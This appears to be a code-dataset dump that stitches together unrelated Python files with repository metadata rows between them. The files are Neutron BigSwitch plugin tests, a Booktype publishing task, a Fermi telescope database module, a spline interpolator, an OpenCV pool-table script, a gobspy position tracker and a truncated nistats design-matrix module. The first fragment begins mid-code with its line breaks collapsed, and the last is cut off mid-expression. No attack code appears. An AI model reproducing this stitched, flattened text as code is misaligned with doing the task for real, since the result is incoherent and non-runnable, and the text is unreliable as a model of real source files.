create=True, new=fake_server.HTTPConnectionMock500) self.httpPatch.start() self.new_update_request('ports', 
data, port['id']).get_response(self.api) self.httpPatch.stop() uport = self._get_ports(n['network']['id'])[0] # name should have stayed the same self.assertEqual(port['name'], uport['name']) def test_rollback_for_port_delete(self): with self.network() as n: with self.port(network_id=n['network']['id'], device_id='somedevid') as port: self.httpPatch = patch('httplib.HTTPConnection', create=True, new=fake_server.HTTPConnectionMock500) self.httpPatch.start() self._delete('ports', port['port']['id'], expected_code= webob.exc.HTTPInternalServerError.code) self.httpPatch.stop() port = self._get_ports(n['network']['id'])[0] self.assertEqual('BUILD', port['status']) def test_correct_shared_net_tenant_id(self): # tenant_id in port requests should match network tenant_id instead # of port tenant_id def rest_port_op(self, ten_id, netid, port): if ten_id != 'SHARED': raise Exception('expecting tenant_id SHARED. got %s' % ten_id) with self.network(tenant_id='SHARED', shared=True) as net: with self.subnet(network=net) as sub: pref = 'neutron.plugins.bigswitch.servermanager.ServerPool.%s' tomock = [pref % 'rest_create_port', pref % 'rest_update_port', pref % 'rest_delete_port'] patches = [patch(f, create=True, new=rest_port_op) for f in tomock] for restp in patches: restp.start() with self.port(subnet=sub, tenant_id='port-owner') as port: data = {'port': {'binding:host_id': 'someotherhost', 'device_id': 'override_dev'}} req = self.new_update_request('ports', data, port['port']['id']) res = req.get_response(self.api) self.assertEqual(res.status_int, 200) def test_create404_triggers_sync(self): # allow async port thread for this patch self.spawn_p.stop() with nested( self.subnet(), patch('httplib.HTTPConnection', create=True, new=fake_server.HTTPConnectionMock404), patch(test_base.RESTPROXY_PKG_PATH + '.NeutronRestProxyV2._send_all_data') ) as (s, mock_http, mock_send_all): with self.port(subnet=s, device_id='somedevid') as p: # wait for the async port thread to finish plugin = NeutronManager.get_plugin() plugin.evpool.waitall() call = mock.call( send_routers=True, send_ports=True, send_floating_ips=True, triggered_by_tenant=p['port']['tenant_id'] ) mock_send_all.assert_has_calls([call]) self.spawn_p.start() class TestBigSwitchProxyPortsV2IVS(test_plugin.TestPortsV2, BigSwitchProxyPluginV2TestCase, test_bindings.PortBindingsTestCase): VIF_TYPE = portbindings.VIF_TYPE_IVS HAS_PORT_FILTER = False def setUp(self): super(TestBigSwitchProxyPortsV2IVS, self).setUp() cfg.CONF.set_override('vif_type', 'ivs', 'NOVA') class TestNoHostIDVIFOverride(test_plugin.TestPortsV2, BigSwitchProxyPluginV2TestCase, test_bindings.PortBindingsTestCase): VIF_TYPE = portbindings.VIF_TYPE_OVS HAS_PORT_FILTER = False def setUp(self): super(TestNoHostIDVIFOverride, self).setUp() cfg.CONF.set_override('vif_type', 'ovs', 'NOVA') def test_port_vif_details(self): kwargs = {'name': 'name', 'device_id': 'override_dev'} with self.port(**kwargs) as port: self.assertEqual(port['port']['binding:vif_type'], portbindings.VIF_TYPE_OVS) class TestBigSwitchVIFOverride(test_plugin.TestPortsV2, BigSwitchProxyPluginV2TestCase, test_bindings.PortBindingsTestCase): VIF_TYPE = portbindings.VIF_TYPE_OVS HAS_PORT_FILTER = False def setUp(self): super(TestBigSwitchVIFOverride, self).setUp() cfg.CONF.set_override('vif_type', 'ovs', 'NOVA') def test_port_vif_details(self): kwargs = {'name': 'name', 'binding:host_id': 'ivshost', 'device_id': 'override_dev'} with self.port(**kwargs) as port: self.assertEqual(port['port']['binding:vif_type'], 
portbindings.VIF_TYPE_IVS) kwargs = {'name': 'name2', 'binding:host_id': 'someotherhost', 'device_id': 'other_dev'} with self.port(**kwargs) as port: self.assertEqual(port['port']['binding:vif_type'], self.VIF_TYPE) def test_port_move(self): kwargs = {'name': 'name', 'binding:host_id': 'ivshost', 'device_id': 'override_dev'} with self.port(**kwargs) as port: data = {'port': {'binding:host_id': 'someotherhost', 'device_id': 'override_dev'}} req = self.new_update_request('ports', data, port['port']['id']) res = self.deserialize(self.fmt, req.get_response(self.api)) self.assertEqual(res['port']['binding:vif_type'], self.VIF_TYPE) def _make_port(self, fmt, net_id, expected_res_status=None, arg_list=None, **kwargs): arg_list = arg_list or () arg_list += ('binding:host_id', ) res = self._create_port(fmt, net_id, expected_res_status, arg_list, **kwargs) # Things can go wrong - raise HTTP exc with res code only # so it can be caught by unit tests if res.status_int >= 400: raise webob.exc.HTTPClientError(code=res.status_int) return self.deserialize(fmt, res) class TestBigSwitchProxyNetworksV2(test_plugin.TestNetworksV2, BigSwitchProxyPluginV2TestCase): def _get_networks(self, tenant_id): ctx = context.Context('', tenant_id) return NeutronManager.get_plugin().get_networks(ctx) def test_rollback_on_network_create(self): tid = test_api_v2._uuid() kwargs = {'tenant_id': tid} self.httpPatch = patch('httplib.HTTPConnection', create=True, new=fake_server.HTTPConnectionMock500) self.httpPatch.start() self._create_network('json', 'netname', True, **kwargs) self.httpPatch.stop() self.assertFalse(self._get_networks(tid)) def test_rollback_on_network_update(self): with self.network() as n: data = {'network': {'name': 'aNewName'}} self.httpPatch = patch('httplib.HTTPConnection', create=True, new=fake_server.HTTPConnectionMock500) self.httpPatch.start() self.new_update_request('networks', data, n['network']['id']).get_response(self.api) self.httpPatch.stop() updatedn = self._get_networks(n['network']['tenant_id'])[0] # name should have stayed the same due to failure self.assertEqual(n['network']['name'], updatedn['name']) def test_rollback_on_network_delete(self): with self.network() as n: self.httpPatch = patch('httplib.HTTPConnection', create=True, new=fake_server.HTTPConnectionMock500) self.httpPatch.start() self._delete('networks', n['network']['id'], expected_code=webob.exc.HTTPInternalServerError.code) self.httpPatch.stop() # network should still exist in db self.assertEqual(n['network']['id'], self._get_networks(n['network']['tenant_id'] )[0]['id']) class TestBigSwitchProxySubnetsV2(test_plugin.TestSubnetsV2, BigSwitchProxyPluginV2TestCase): pass class TestBigSwitchProxySync(BigSwitchProxyPluginV2TestCase): def test_send_data(self): plugin_obj = NeutronManager.get_plugin() result = plugin_obj._send_all_data() self.assertEqual(result[0], 200) class TestBigSwitchAddressPairs(BigSwitchProxyPluginV2TestCase, test_addr_pair.TestAllowedAddressPairs): pass
apache-2.0
-6,112,451,128,211,050,000
41.864952
79
0.57295
false
4.131081
true
false
false
rob-hills/Booktype
lib/booktype/apps/edit/tasks.py
1
2110
import json import celery import urllib2 import httplib import sputnik from booki.editor import models def fetch_url(url, data): try: data_json = json.dumps(data) except TypeError: return None req = urllib2.Request(url, data_json) req.add_header('Content-Type', 'application/json') req.add_header('Content-Length', len(data_json)) try: r = urllib2.urlopen(req) except (urllib2.HTTPError, urllib2.URLError, httplib.HTTPException): pass except Exception: pass # should really be a loop of some kind try: s = r.read() dta = json.loads(s.strip()) except: return None return dta @celery.task def publish_book(*args, **kwargs): import urllib2 import json import logging # set logger logger = logging.getLogger('booktype') logger.debug(kwargs) book = models.Book.objects.get(id=kwargs['bookid']) data = { "assets" : { "testbook.epub" : "http://127.0.0.1:8000/%s/_export/" % book.url_title }, "input" : "testbook.epub", "outputs": { "two" : { "profile" : "epub", "config": { 'project_id': book.url_title }, "output" : "testbook.epub" } } } logger.debug(data) result = fetch_url('http://127.0.0.1:8000/_convert/', data) logger.debug(result) task_id = result['task_id'] while True: logger.debug('http://127.0.0.1:8000/_convert/%s' % task_id) response = urllib2.urlopen('http://127.0.0.1:8000/_convert/%s' % task_id).read() dta = json.loads(response) logger.debug(dta) sputnik.addMessageToChannel2( kwargs['clientid'], kwargs['sputnikid'], "/booktype/book/%s/%s/" % (book.pk, kwargs['version']), { "command": "publish_progress", "state": dta['state'] }, myself=True ) if dta['state'] in ['SUCCESS', 'FAILURE']: break
agpl-3.0
1,521,317,830,055,630,300
23.264368
88
0.536019
false
3.644214
false
false
false
giacomov/fermi_blind_search
fermi_blind_search/database.py
1
14427
#!/usr/bin/env python from contextlib import contextmanager import argparse import sys import sshtunnel from sqlalchemy import * from sqlalchemy.ext.declarative import declarative_base from sqlalchemy.orm import sessionmaker from fermi_blind_search.configuration import get_config from fermi_blind_search import myLogging _logger = myLogging.log.getLogger("database") # will store the engine that will connect to the database _engine = None # we need this to handle the tables Base = declarative_base() # defines the class that will connect to the database Session = sessionmaker() @contextmanager def database_connection(config): if config.get("SSH db tunnel", "remote_host") != '': """ As of now, we are not using this in the real time search. Instead we are using an autossh connection to facilitate tunneling. However, we are keeping the code here in case an ssh tunnel needs to be established from a python script in the future. """ with sshtunnel.SSHTunnelForwarder(config.get("SSH db tunnel", "remote_host"), ssh_username=config.get("SSH db tunnel", "username"), host_pkey_directories=[ config.get("SSH db tunnel", "key_directory")], remote_bind_address=('127.0.0.1', int(config.get("SSH db tunnel", "tunnel_port"))), local_bind_address=('localhost', int(config.get('Real time', 'db_port'))), ): db_instance = Database(config) try: yield db_instance except: raise finally: db_instance.close() else: db_instance = Database(config) try: yield db_instance except: raise finally: db_instance.close() class Database(object): def __init__(self, config): global Base global Session global _engine # initialize the engine using parameters from the config file if config.get("Real time", "is_sqlite") == "True": engine_url = "sqlite:///" + config.get("Real time", "db_path") else: engine_url = config.get("Real time", "db_dialect") + "://" + config.get("Real time", "db_username") + ":" + \ config.get("Real time", "db_password") + "@" + config.get("Real time", "db_host") + ":" + \ config.get("Real time", "db_port") + "/" + config.get("Real time", "db_path") _logger.debug("Database engine URL: %s" % engine_url) _engine = create_engine(engine_url) # bind the engine to the Base Base.metadata.bind = _engine # bind the engine to the session Session.configure(bind=_engine) self._config = config def create_tables(self): # create the Analysis and Results tables Base.metadata.create_all(_engine) _logger.info("Successfully created database tables") def delete_analysis_table(self): # drop the table from the DB try: Analysis.__table__.drop() except: try: # another way to drop the table Analysis.__table__.drop(_engine) except: _logger.error('ERROR: Could not delete Analysis Table') raise else: _logger.info("Successfully deleted Analysis table") def delete_results_table(self): # drop the table from the DB try: Results.__table__.drop() except: try: # another way to drop the table Results.__table__.drop(_engine) except: _logger.error('ERROR: Could not delete Results Table') raise else: _logger.info("Successfully delete Results table") def add_analysis(self, analysis_vals): # TODO: which check that analysis_vals contains the correct field? # TODO: do we want to add a check that the analysis doesn't already exist? assert (analysis_vals['met_start'] is not None and analysis_vals['duration'] is not None and analysis_vals['counts'] is not None and analysis_vals['directory'] is not None), \ "One of the parameters to enter the analysis into the database is missing. 
Parameters are met_start, " \ "duration, counts, and directory" assert isinstance(analysis_vals["counts"], int), "Counts is not an integer" try: # set the values of the analysis to be added to the table new_analysis = Analysis(met_start=analysis_vals['met_start'], duration=analysis_vals['duration'], counts=analysis_vals['counts'], directory=analysis_vals['directory']) _logger.info("Adding this Analysis to the database: %s" % new_analysis) except KeyError: _logger.error('ERROR: The analysis you want to add does not have the proper fields!') raise except: raise else: # open a session, add the analysis to the table, close the session session = Session() session.add(new_analysis) try: session.commit() except: raise else: _logger.debug("Successfully added analysis to db") def update_analysis_counts(self, met_start, duration, new_counts): # open a session with the DB session = Session() # get the analysis to be updated results = session.query(Analysis).filter(Analysis.met_start == met_start).filter( Analysis.duration == duration).all() # check that there is only one analysis that matches these parameters assert len(results) != 0, "Cannot update this analysis because it does not exist" assert len(results) == 1, 'More than one analysis exists with these parameters! This should never happen' analysis = results[0] _logger.info("Updating this analysis: %s to have %s counts" % (analysis, new_counts)) # update the counts column of the analysis in question analysis.counts = new_counts try: # commit the change session.commit() except: raise else: _logger.debug("Successfully updated analysis") def add_candidate(self, candidate_vals): # TODO: which check that condidate_vals contains the correct field? # TODO: do we want to add a check that the candidate doesn't already exist? assert (candidate_vals['ra'] is not None and candidate_vals['dec'] is not None and candidate_vals['met_start'] is not None and candidate_vals['interval'] is not None and candidate_vals['email'] is not None), \ "One of the parameters to enter the candidate into the database is missing. 
Parameters are ra, dec, " \ "met_start, interval, email" try: # set the values of the result to be added to the table new_candidate = Results(ra=candidate_vals['ra'], dec=candidate_vals['dec'], met_start=candidate_vals['met_start'], interval=candidate_vals['interval'], email=candidate_vals['email']) _logger.info("Adding this result to the database %s" % new_candidate) except KeyError: _logger.error('ERROR: The result you want to add does not have the proper fields') raise except: raise else: # open a session, add the result to the table, close the session session = Session() session.add(new_candidate) try: session.commit() except: raise else: _logger.debug("Successfully added result to database") return new_candidate def get_analysis_between_times(self, start, stop): _logger.info("Fetching analyses using data between %s and %s" % (start, stop)) # open a session session = Session() # get all analyses with met_start or met_stop (met_start + duration) times within the range [start,stop] return session.query(Analysis).filter(or_(and_(Analysis.met_start >= start, Analysis.met_start <= stop), and_(Analysis.met_start + Analysis.duration >= start, Analysis.met_start + Analysis.duration <= stop))).all() def get_exact_analysis(self, start, stop): _logger.info("Fetching analysis with met_start = %s and met_start + duration = %s" % (start, stop)) # open a session session = Session() # get all analyses with start time and stop times exactly matching the parameters return session.query(Analysis).filter(and_(Analysis.met_start == start, Analysis.met_start + Analysis.duration == stop)).all() def get_results(self, candidate_vals): # check that candidate vals has the correct fields to perform a search assert (candidate_vals['ra'] is not None and candidate_vals['dec'] is not None and candidate_vals['met_start'] is not None and candidate_vals['interval'] is not None), \ "One of the parameters to enter the candidate into the database is missing. 
Parameters are ra, dec, " \ "met_start, interval" # open a session session = Session() # get the tolerance ranges for determining if we have a match ra_tol = float(self._config.get("Real time", "ra_tol")) dec_tol = float(self._config.get("Real time", "dec_tol")) start_tol = float(self._config.get("Real time", "start_tol")) int_tol = float(self._config.get("Real time", "int_tol")) _logger.info("Fetching results within %s of ra, %s of dec, %s of met_start, and %s of interval of %s" % (ra_tol, dec_tol, start_tol, int_tol, candidate_vals)) # get all results that match the passed candidate within a certain tolerance return session.query(Results).filter(and_(candidate_vals['ra'] - ra_tol <= Results.ra, Results.ra <= candidate_vals['ra'] + ra_tol, candidate_vals['dec'] - dec_tol <= Results.dec, Results.dec <= candidate_vals['dec'] + dec_tol, candidate_vals['met_start'] - start_tol <= Results.met_start, Results.met_start <= candidate_vals['met_start'] + start_tol, candidate_vals['interval'] - int_tol <= Results.interval, Results.interval <= candidate_vals['interval'] + int_tol)).all() def get_results_to_email(self): _logger.info("Fetching results with email = False (0 in database)") # open a session session = Session() # get all results that have not been emailed yet return session.query(Results).filter(Results.email == 0).all() def update_result_email(self, candidate, email_val=False): _logger.info("Updating result: %s to have email value: %s" % (candidate, email_val)) # open a session session = Session() # update the value of the candidate candidate.email = email_val try: # commit the change session.commit() except: raise else: _logger.debug("Successfully updated result") def close(self): global _logger _logger.info("Closing database") Session.close_all() class Analysis(Base): # give the table a name __tablename__ = 'analysis' # define the columns of the table met_start = Column(Float(32), Sequence('analysis_met_start_seq'), primary_key=True) duration = Column(Float(32), Sequence('analysis_duration_seq'), primary_key=True) counts = Column(Integer) directory = Column(String(250)) def __repr__(self): # formatting string so that printing rows from the table is more readable return "<Analysis(met_start= %s, duration= %s, counts= %s, directory= %s)>" % \ (self.met_start, self.duration, self.counts, self.directory) class Results(Base): # give the table a name __tablename__ = 'results' # define the columns of the table ra = Column(Float(32)) dec = Column(Float(32)) met_start = Column(Float(32), Sequence('results_met_start_seq'), primary_key=True) interval = Column(Float(32), Sequence('results_interval_seq'), primary_key=True) email = Column(Boolean) def __repr__(self): # formatting string so that printing rows from the table is more readable return "<Results(ra= %s, dec= %s, met_start= %s, interval= %s, email=%s)>" % (self.ra, self.dec, self.met_start, self.interval, self.email) if __name__ == "__main__": # Allows you to quickly delete and re-create the database. parser = argparse.ArgumentParser() parser.add_argument('--config', help='Path to config file', type=get_config, required=True) parser.add_argument('--clear', help="If set, delete the database tables, and recreate them", action="store_true") args = parser.parse_args() configuration = args.config # start db connection db = Database(configuration) if args.clear: # delete the tables db.delete_analysis_table() db.delete_results_table() # re-create the tables db.create_tables()
bsd-3-clause
5,104,153,105,042,348,000
36.375648
121
0.563249
false
4.606322
true
false
false
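A note on the record above: the tolerance-window match performed by Database.get_results can be sketched without SQLAlchemy or a live database. Below is a minimal, self-contained Python sketch of the same AND-of-ranges logic; the tolerance defaults and the example dictionaries are hypothetical, not values from any real config file.

def matches_within_tolerance(row, cand, ra_tol=0.5, dec_tol=0.5,
                             start_tol=10.0, int_tol=10.0):
    # mirrors the conjunction of range checks in Database.get_results:
    # a stored result matches when every field lies inside the
    # candidate's tolerance window
    return (cand['ra'] - ra_tol <= row['ra'] <= cand['ra'] + ra_tol and
            cand['dec'] - dec_tol <= row['dec'] <= cand['dec'] + dec_tol and
            cand['met_start'] - start_tol <= row['met_start'] <= cand['met_start'] + start_tol and
            cand['interval'] - int_tol <= row['interval'] <= cand['interval'] + int_tol)

# hypothetical example values
stored = {'ra': 83.6, 'dec': 22.0, 'met_start': 500000000.0, 'interval': 100.0}
candidate = {'ra': 83.4, 'dec': 22.2, 'met_start': 500000005.0, 'interval': 95.0}
print(matches_within_tolerance(stored, candidate))  # True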
saisai/algorithms_by_other
splinte-interplation/spline-interpolation.py
1
2896
#!/usr/bin/env python
# -*- coding: utf-8 -*-


def niceCubicPolynomial(p):
    tmp = ""
    if p["a"] == 1:
        tmp += " x^3"
    elif p["a"] != 0:
        tmp += "%.2fx^3" % p["a"]
    if p["b"] == 1:
        tmp += "\t+ x^2"
    elif p["b"] != 0:
        tmp += "\t+ %.2fx^2" % p["b"]
    else:
        tmp += "\t\t"
    if p["c"] == 1:
        tmp += "\t+ x"
    elif p["c"] != 0:
        tmp += "\t+ %.2fx" % p["c"]
    else:
        tmp += "\t\t"
    if p["d"] != 0:
        tmp += "\t+ %.2f" % p["d"]
    return tmp


def getSpline(points):
    """points should be a list of maps,
    where each map represents a point and has "x" and "y"
    """
    import numpy, scipy.linalg

    # sort points by x value
    points = sorted(points, key=lambda point: point["x"])

    n = len(points) - 1

    # Set up a system of equations of form Ax=b
    A = numpy.zeros(shape=(4*n, 4*n))
    b = numpy.zeros(shape=(4*n, 1))

    for i in range(0, n):
        # 2n equations from conditions (S2)
        A[i][4*i+0] = points[i]["x"]**3
        A[i][4*i+1] = points[i]["x"]**2
        A[i][4*i+2] = points[i]["x"]
        A[i][4*i+3] = 1
        b[i] = points[i]["y"]

        A[n+i][4*i+0] = points[i+1]["x"]**3
        A[n+i][4*i+1] = points[i+1]["x"]**2
        A[n+i][4*i+2] = points[i+1]["x"]
        A[n+i][4*i+3] = 1
        b[n+i] = points[i+1]["y"]

        # 2n-2 equations for (S3):
        if i == 0:
            continue

        # point i is an inner point
        A[2*n+(i-1)][4*(i-1)+0] = 3*points[i]["x"]**2
        A[2*n+(i-1)][4*(i-1)+1] = 2*points[i]["x"]
        A[2*n+(i-1)][4*(i-1)+2] = 1
        A[2*n+(i-1)][4*(i-1)+0+4] = -3*points[i]["x"]**2
        A[2*n+(i-1)][4*(i-1)+1+4] = -2*points[i]["x"]
        A[2*n+(i-1)][4*(i-1)+2+4] = -1
        b[2*n+(i-1)] = 0

        A[3*n+(i-1)][4*(i-1)+0] = 6*points[i]["x"]
        A[3*n+(i-1)][4*(i-1)+1] = 2
        A[3*n+(i-1)][4*(i-1)+0+4] = -6*points[i]["x"]
        A[3*n+(i-1)][4*(i-1)+1+4] = -2
        b[3*n+(i-1)] = 0

    # Natural spline: second derivative vanishes at both endpoints
    A[3*n-1+0][0+0] += 6*points[0]["x"]
    A[3*n-1+0][0+1] += 2
    b[3*n-1+0] += 0

    A[3*n+n-1][4*(n-1)+0] += 6*points[n]["x"]
    A[3*n+n-1][4*(n-1)+1] += 2
    b[3*n+n-1] += 0

    x = scipy.linalg.solve(A, b)

    spline = []
    for i in range(0, n):
        spline.append({"u": points[i]["x"], "v": points[i+1]["x"],
                       "a": float(x[4*i+0]), "b": float(x[4*i+1]),
                       "c": float(x[4*i+2]), "d": float(x[4*i+3])})
    return spline


if __name__ == "__main__":
    points = []
    points.append({"x": 0.0, "y": -4})
    points.append({"x": 1.0, "y": 9})
    points.append({"x": 2.0, "y": 35})
    points.append({"x": 3.0, "y": 70})
    spline = getSpline(points)

    for p in spline:
        tmp = "[%.2f, %.2f]:" % (p["u"], p["v"])
        tmp += niceCubicPolynomial(p)
        print(tmp)
mit
-5,942,451,878,458,563,000
27.96
66
0.397099
false
2.362153
false
false
false
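The spline returned by getSpline above is just a list of cubic pieces with keys u, v, a, b, c, d; evaluating it at an arbitrary x means picking the piece whose [u, v] interval contains x. A small sketch of such an evaluator follows; the clamping behaviour outside the fitted range is an assumption for illustration, not part of the original file.

def evaluate_spline(spline, x):
    # pick the cubic piece whose interval [u, v] contains x;
    # outside the fitted range we clamp to the nearest piece (assumption)
    piece = spline[0] if x < spline[0]["u"] else spline[-1]
    for p in spline:
        if p["u"] <= x <= p["v"]:
            piece = p
            break
    return (piece["a"]*x**3 + piece["b"]*x**2 +
            piece["c"]*x + piece["d"])

# With the points from the __main__ block, the interpolant should
# reproduce the knots, e.g. evaluate_spline(spline, 1.0) ~= 9.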
Edeleon4/PoolShark
scripts/hist.py
1
2214
import cv2
import numpy as np

frame = cv2.imread('/mnt/c/Users/T-HUNTEL/Desktop/hackathon/table3.jpg')
h, w, c = frame.shape
print frame.shape

# Convert BGR to HSV
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)

BORDER_COLOR = 0

def flood_fill(image, x, y, value):
    """Flood fill on a region of non-BORDER_COLOR pixels.

    x indexes rows and y indexes columns, matching how the function
    is called below (flood_fill(image, row, col, value)).
    """
    count = 1
    points = [(x, y)]
    if x >= image.shape[0] or y >= image.shape[1] or image[x, y] == BORDER_COLOR:
        return None, None
    edge = [(x, y)]
    image[x, y] = value

    while edge:
        newedge = []
        for (x, y) in edge:
            for (s, t) in ((x+1, y), (x-1, y), (x, y+1), (x, y-1)):
                # stay inside the image bounds before reading image[s, t]
                if 0 <= s < image.shape[0] and 0 <= t < image.shape[1] and \
                        image[s, t] not in (BORDER_COLOR, value):
                    image[s, t] = value
                    points.append((s, t))
                    count += 1
                    newedge.append((s, t))
        edge = newedge

    return count, points

# thresholds for different balls / background
low_bkg = np.array([15, 40, 50], dtype=np.uint8)
high_bkg = np.array([40, 190, 200], dtype=np.uint8)

lower_blue = np.array([110, 50, 50], dtype=np.uint8)
upper_blue = np.array([130, 255, 255], dtype=np.uint8)

low_yellow = np.array([20, 30, 30], dtype=np.uint8)
high_yellow = np.array([30, 255, 255], dtype=np.uint8)

# mask out the background
mask = cv2.inRange(hsv, low_bkg, high_bkg)
mask = np.invert(mask)

# Bitwise-AND mask and original image
objects = cv2.bitwise_and(frame, frame, mask=mask)
hsv = cv2.cvtColor(objects, cv2.COLOR_BGR2HSV)

# mask the yellow balls
mask = cv2.inRange(hsv, low_yellow, high_yellow)
yellows = cv2.bitwise_and(objects, objects, mask=mask)

# find the biggest cloud of 1's in the yellow mask
biggest_cloud = []
biggest_count = 0
image = mask / 255.
while len(np.where(image == 1)[0]) > 0:
    loc = np.where(image == 1)
    y = loc[0][0]
    x = loc[1][0]
    count, cloud = flood_fill(image, y, x, 2)
    if count > biggest_count:
        print count
        biggest_count = count
        biggest_cloud = cloud

print biggest_cloud
print biggest_count

cv2.imwrite('mask.jpg', mask)
cv2.imwrite('yellows.jpg', yellows)
cv2.imwrite('frame.jpg', frame)
mit
-4,887,612,138,901,576,000
25.357143
80
0.604788
false
2.777917
false
false
false
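The flood fill in hist.py above is a plain breadth-first region grow, which can be checked on a tiny array without OpenCV. The sketch below reimplements the same idea in isolation; the toy mask is made up for illustration.

import numpy as np

def region_size(image, row, col, value):
    # grow a 4-connected region of 1's starting at (row, col),
    # relabelling visited pixels with `value`, the same scheme as
    # flood_fill() in hist.py minus the point list
    if image[row, col] != 1:
        return 0
    count, edge = 1, [(row, col)]
    image[row, col] = value
    while edge:
        newedge = []
        for (r, c) in edge:
            for (s, t) in ((r+1, c), (r-1, c), (r, c+1), (r, c-1)):
                if 0 <= s < image.shape[0] and 0 <= t < image.shape[1] \
                        and image[s, t] == 1:
                    image[s, t] = value
                    count += 1
                    newedge.append((s, t))
        edge = newedge
    return count

toy = np.array([[1, 1, 0],
                [0, 1, 0],
                [0, 0, 1]], dtype=float)
print(region_size(toy, 0, 0, 2))  # 3: the connected blob in the corner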
arypbatista/gobspy
gobspyide/common/position.py
1
4075
# -*- coding: utf-8 -*- # # Copyright (C) 2011-2017 Ary Pablo Batista <arypbatista@gmail.com>, Pablo Barenbaum <foones@gmail.com> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # import os import common.i18n as i18n from common.utils import * #### Tracking of positions inside source files. #### #### ProgramElements are elements inside a program, typically #### tokens or AST nodes. #### #### ProgramAreas are specific regions of the program, such #### as the area after a given token. class ProgramElement(object): """Represents an element inside a program. Subclasses should implement: pos_begin: starting position pos_end: final position description(): human readable description""" def source(self): return self.pos_begin.string[self.pos_begin.start:self.pos_end.start] class Position(object): "Represents a position in a source file or string." def __init__(self, string, filename='...', start=0, row=1, col=1): self.string = string self._filename = filename self.start = start self.row = row self.col = col def after_reading(self, string): """Returns the position that results after reading the characters in the string.""" new_start = self.start + len(string) newlines = string.count('\n') new_row = self.row + newlines if newlines == 0: new_col = self.col + len(string) else: new_col = len(string) - string.rindex('\n') return Position(self.string, self._filename, new_start, new_row, new_col) def __repr__(self): return '%s:%s:%s' % (self._filename, self.row, self.col) def filename(self): return self._filename def row_col(self): return '%s %s, %s %s' % (i18n.i18n('line'), self.row, i18n.i18n('column'), self.col) def file_row_col(self): return '%s (%s)' % (self.filename(), self.row_col()) def file_row(self): return '(%s:%s)' % (self.filename(), self.row) def line_before(self): try: r = self.string.rindex('\n', 0, self.start) res = self.string[r + 1:self.start] except ValueError: res = self.string[:self.start] return expand_tabs(res) def two_lines_after(self): try: r1 = self.string.index('\n', self.start) l1 = self.string[self.start:r1] try: r2 = self.string.index('\n', r1 + 1) l2 = self.string[r1+1:r2] res = [l1, l2] except ValueError: res = [l1] except ValueError: res = [self.string[self.start:]] return map(expand_tabs, res) class ProgramArea(object): "Represents an area of a program." 
    def __repr__(self):
        return '(...)'

class ProgramAreaNear(ProgramArea):
    """Represents the area of a program that
occurs near the beginning of a given program element."""
    def __init__(self, elem):
        self.elem = elem
    def __repr__(self):
        l1 = '%s\n%s %s' % (self.elem.pos_begin.file_row_col(),
                            i18n.i18n('near'),
                            self.elem.description())
        before = self.elem.pos_begin.line_before()
        after = self.elem.pos_end.two_lines_after()
        ind = ' ' * len(before)
        l2 = ind + '|' + '\n' + ind + 'V'
        src = self.elem.source()
        if len(src) < 50:
            l3 = '%s%s%s' % (before, src, after[0])
            if len(after) > 1:
                l3 += '\n'
        else:
            l3 = '%s%s' % (before, src[:50])
            if src[-1] != '\n':
                l3 += '...\n'
        return '\n'.join(['--', l1, l2, l3, '--'])
    def interval(self):
        return self.elem.pos_begin, self.elem.pos_end
    def filename(self):
        return self.elem.pos_begin.filename()
gpl-3.0
1,046,354,306,264,107,000
33.82906
103
0.637301
false
3.313008
false
false
false
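Position.after_reading in the record above is the heart of the tracker: it advances start/row/col depending on how many newlines the consumed text contains. Here is a standalone sketch of the same arithmetic, reimplemented without the class purely for illustration.

def advance(row, col, text):
    # same rule as Position.after_reading: with no newline the column
    # grows by the length read; otherwise the column restarts as the
    # distance past the last '\n' (1-based, pointing at the next char)
    newlines = text.count('\n')
    if newlines == 0:
        return row, col + len(text)
    return row + newlines, len(text) - text.rindex('\n')

print(advance(1, 1, "abc"))     # (1, 4)
print(advance(1, 1, "ab\ncd"))  # (2, 3)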
nistats/nistats
nistats/design_matrix.py
1
17077
""" This module implements fMRI Design Matrix creation. Design matrices are represented by Pandas DataFrames Computations of the different parts of the design matrix are confined to the make_first_level_design_matrix function, that create a DataFrame All the others are ancillary functions. Design matrices contain three different types of regressors: 1. Task-related regressors, that result from the convolution of the experimental paradigm regressors with hemodynamic models A hemodynamic model is one of: - 'spm' : linear filter used in the SPM software - 'glover' : linear filter estimated by G.Glover - 'spm + derivative', 'glover + derivative': the same linear models, plus their time derivative (2 regressors per condition) - 'spm + derivative + dispersion', 'glover + derivative + dispersion': idem plus the derivative wrt the dispersion parameter of the hrf (3 regressors per condition) - 'fir' : finite impulse response model, generic linear filter 2. User-specified regressors, that represent information available on the data, e.g. motion parameters, physiological data resampled at the acquisition rate, or sinusoidal regressors that model the signal at a frequency of interest. 3. Drift regressors, that represent low_frequency phenomena of no interest in the data; they need to be included to reduce variance estimates. Author: Bertrand Thirion, 2009-2015 """ from __future__ import with_statement import sys from warnings import warn import numpy as np import pandas as pd from .experimental_paradigm import check_events from .hemodynamic_models import compute_regressor, _orthogonalize from .utils import full_rank, _basestring ###################################################################### # Ancillary functions ###################################################################### def _poly_drift(order, frame_times): """Create a polynomial drift matrix Parameters ---------- order : int, Number of polynomials in the drift model. frame_times : array of shape(n_scans), Time stamps used to sample polynomials. Returns ------- pol : ndarray, shape(n_scans, order + 1) estimated polynomial drifts plus a constant regressor """ order = int(order) pol = np.zeros((np.size(frame_times), order + 1)) tmax = float(frame_times.max()) for k in range(order + 1): pol[:, k] = (frame_times / tmax) ** k pol = _orthogonalize(pol) pol = np.hstack((pol[:, 1:], pol[:, :1])) return pol def _cosine_drift(high_pass, frame_times): """Create a cosine drift matrix with frequencies or equal to high_pass. Parameters ---------- high_pass : float Cut frequency of the high-pass filter in Hz frame_times : array of shape (n_scans,) The sampling times in seconds Returns ------- cosine_drift : array of shape(n_scans, n_drifts) Cosine drifts plus a constant regressor at cosine_drift[:, -1] Ref: http://en.wikipedia.org/wiki/Discrete_cosine_transform DCT-II """ n_frames = len(frame_times) n_times = np.arange(n_frames) dt = (frame_times[-1] - frame_times[0]) / (n_frames - 1) if high_pass * dt >= .5: warn('High-pass filter will span all accessible frequencies ' 'and saturate the design matrix. ' 'You may want to reduce the high_pass value.' 'The provided value is {0} Hz'.format(high_pass)) order = 